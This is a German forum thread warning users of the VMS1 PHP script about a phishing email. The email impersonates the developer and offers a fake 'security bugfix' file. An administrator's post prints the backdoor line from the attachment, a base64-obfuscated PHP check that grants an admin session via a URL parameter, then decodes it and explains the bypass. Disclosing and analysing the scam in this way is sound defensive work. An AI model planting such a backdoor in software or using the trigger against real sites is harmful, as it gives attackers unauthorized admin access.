Ergebnis 1 bis 6 von 6

Thema: Email Spamm 20.05.2013

  1. #1
    Erfahrener Benutzer
    Registriert seit
    22.07.2006
    Beiträge
    273

    Email Spamm 20.05.2013

    Hi

    Ich hab eben die Mail erhalten:
    Hallo,

    du verwendest auf deiner Seite das VMS1 Script von designerscripte.net, dieses enthält jedoch beim Adminlogin einen großen Sicherheitsfehler.

    Dieser wurde noch nicht ausgemerzt und anscheinend auch noch nicht missbraucht. Trotzdem habe ich dafür jetzt ein Bugfix entwickelt.

    Um den Fehler zu beheben bitte einfach die Datei adminforce/index.php deiner Installation durch die im Anhang ersetzen, dort ist eine zusätzliche Sicherheitsklasse integriert. Dieser Bugfix wird wärmstens von mir empfohlen.

    vG
    Joel Kuder
    Admin Designerscripte.net, Snippis & LKTechnik
    http://www.designerscripte.net/ - Home of VMS1
    Das Problem an dieser Mail ist, das die Angebliche Sicherheitslücke nicht!! existiert.
    Ganz im Gegenteil, tauscht man die in der Anlage befindliche index.php aus, öffnet man jedem der den geänderten Code entschlüsseln kann den Zugang zu einem Adminforce und das ist wohl nicht erwünscht.

    Also auf KEINEN Fall die Index.php austauschen. Der Code der in Zeile 15 steht (Base64 verschlüsselt) ist schädlich.

    Grüße
    Marc

  2. #2
    Administrator Avatar von Lokutos
    Registriert seit
    29.03.2008
    Beiträge
    3.147

    Email Spamm 20.05.2013

    Ich wurde darüber informiert das in meinem Nahmen Mails versendet werden.

    Die Emails Sind SPAMM
    Installiert dieses "Bugfix" NICHT.
    Wer diese Datei bereits eingefügt hat Sollte diese Umgehend entfernen.
    Die Originaldatei kann im Downloadbereich heruntergeladen werden.


    Ich sende emails nur von Topleveldomains wie Designerscripte.net oderlktechnik.ch
    von arcor 1und1 web.de etc werdet ihr NIEMALS emails von mir bekommen.

    Ich werde gegen Richard Strafanzeige stellen.

    Gesendet: Montag, 20. Mai 2013 um 13:21 UhrVon: yunn@arcor.de
    Betreff: Aw: Sicherheits-Patch: VMS1
    Und hier wäre der Bugfix. Aus unerklärlichen Gründen konnte ich den gerade nicht anhängen.

    vG
    Joel Kuder
    Admin Designerscripte.net, Snippis & LKTechnik
    http://www.designerscripte.net/ - Home of VMS1

    ----- Original Nachricht ----
    Von: yunn@arcor.de
    Datum: 20.05.2013 13:20
    Betreff: Sicherheits-Patch: VMS1

    > Hallo,
    >
    > du verwendest auf deiner Seite das VMS1 Script von designerscripte.net,
    > dieses enthält jedoch beim Adminlogin einen großen Sicherheitsfehler.
    >
    > Dieser wurde noch nicht ausgemerzt und anscheinend auch noch nicht
    > missbraucht. Trotzdem habe ich dafür jetzt ein Bugfix entwickelt.
    >
    > Um den Fehler zu beheben bitte einfach die Datei adminforce/index.php deiner
    > Installation durch die im Anhang ersetzen, dort ist eine zusätzliche
    > Sicherheitsklasse integriert. Dieser Bugfix wird wärmstens von mir
    > empfohlen.
    >
    > vG
    > Joel Kuder
    > Admin Designerscripte.net, Snippis & LKTechnik
    > http://www.designerscripte.net/ - Home of VMS1


    >
    Anhang:


    Aufklärung:

    Folgender eingefügter Code (in der Datei
    PHP-Code:
    <?php if($_GET[base64_decode('cmljaGFyZA==')]==base64_decode('amE=')){$_SESSION[base64_decode('YWRtaW4=')]=1;}?>
    bedeutet gleich viel wie:
    PHP-Code:
    <?php if($_GET['richard']=='ja'){$_SESSION['admin']=1;}?>
    Bedeutet wenn url.tld/admin/index.php?richard=ja aufgerufen wird ist man eingeloggt!!!
    SwissNetWorX - VMS Hosting / V-Server / Cloud-Server / Hosting

  3. #3
    Erfahrener Benutzer Avatar von jpwfour
    Registriert seit
    06.02.2008
    Beiträge
    3.717

    AW: Versuch in den Admin rein zu kommen mit angeblicher Sicherheitslücke im Admin

    Hast du mal geschaut, von wem die EMail kam? Also im Quelltext der Mail (falls die Absenderadresse gefaked wurde).
    Kam die Mail an die Adresse aus deinem Impressum, oder die mit der du hier auf DSN angeeldet bist?

    Achso: Adminforce sollte eh via .htaccess mit einem extra Passwort geschützt sein, dann kann einem das auch egal sein, ob der PHP Login eine Sicherheitslücke hätte (was er ja nicht hat).
    Kill one man, and you are a murderer.
    Kill millions of men, and you are a conqueror.
    Kill them all, and you are a god.
    - Jean Rostand, Thoughts of a Biologist (1939)

  4. #4
    Erfahrener Benutzer
    Registriert seit
    22.07.2006
    Beiträge
    273

    AW: Email Spamm 20.05.2013

    Hab gerade mal nachgeschaut, die Mail kam an eine Adresse die weder hier noch auf meiner Seite steht aber hier vor einiger Zeit mal eingetragen war.
    Der Absender ist yunn@arcor.de, also eine einfach angelegte E-Mail Adresse

  5. #5
    Gesperrt
    Registriert seit
    09.11.2010
    Beiträge
    126

    AW: Email Spamm 20.05.2013

    wird ja immer schlimmer mit dem kerl müssen doch jetzt schon einige anzeigen gegen ihn laufen oder nicht ?

  6. #6
    Moderator Avatar von Worka
    Registriert seit
    21.05.2007
    Beiträge
    973

    AW: Email Spamm 20.05.2013

    Ggf. versucht er deswegen in den bekannten Foren (nicht nur auf Klamm.de) die Threads über sich schliessen zu lassen.
    Die Anzeigenflut wird der Familie vielleicht inzwischen lässtig.
    StGB § 328 Absatz 2.3: Mit Freiheitsstrafe bis zu fünf Jahren oder mit Geldstrafe wird bestraft, wer eine nukleare Explosion verursacht.

Ähnliche Themen

  1. FAKE Email 08.12.2013
    Von Lokutos im Forum Ankündigungen (erledigt)
    Antworten: 0
    Letzter Beitrag: 09.12.2013, 00:02
  2. (A) Auktion Ancient Temple - 22.09.2013-18.00 Uhr
    Von BlueMar-Visions im Forum Scripte
    Antworten: 0
    Letzter Beitrag: 21.09.2013, 11:37
  3. ++Neu++Ancient Temple++CF++Top Angebot bis 12.09.2013++
    Von BlueMar-Visions im Forum Scripte
    Antworten: 7
    Letzter Beitrag: 20.09.2013, 22:38
  4. Ralley (2013 ist nicht in der Auswahlbox)
    Von traffichits im Forum Support zu Addons & Erweiterungen
    Antworten: 7
    Letzter Beitrag: 28.12.2012, 15:43
  5. 7€ pro Email verdienen
    Von KiLLzOnE im Forum Talk, talk, talk...
    Antworten: 4
    Letzter Beitrag: 10.11.2007, 18:20

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •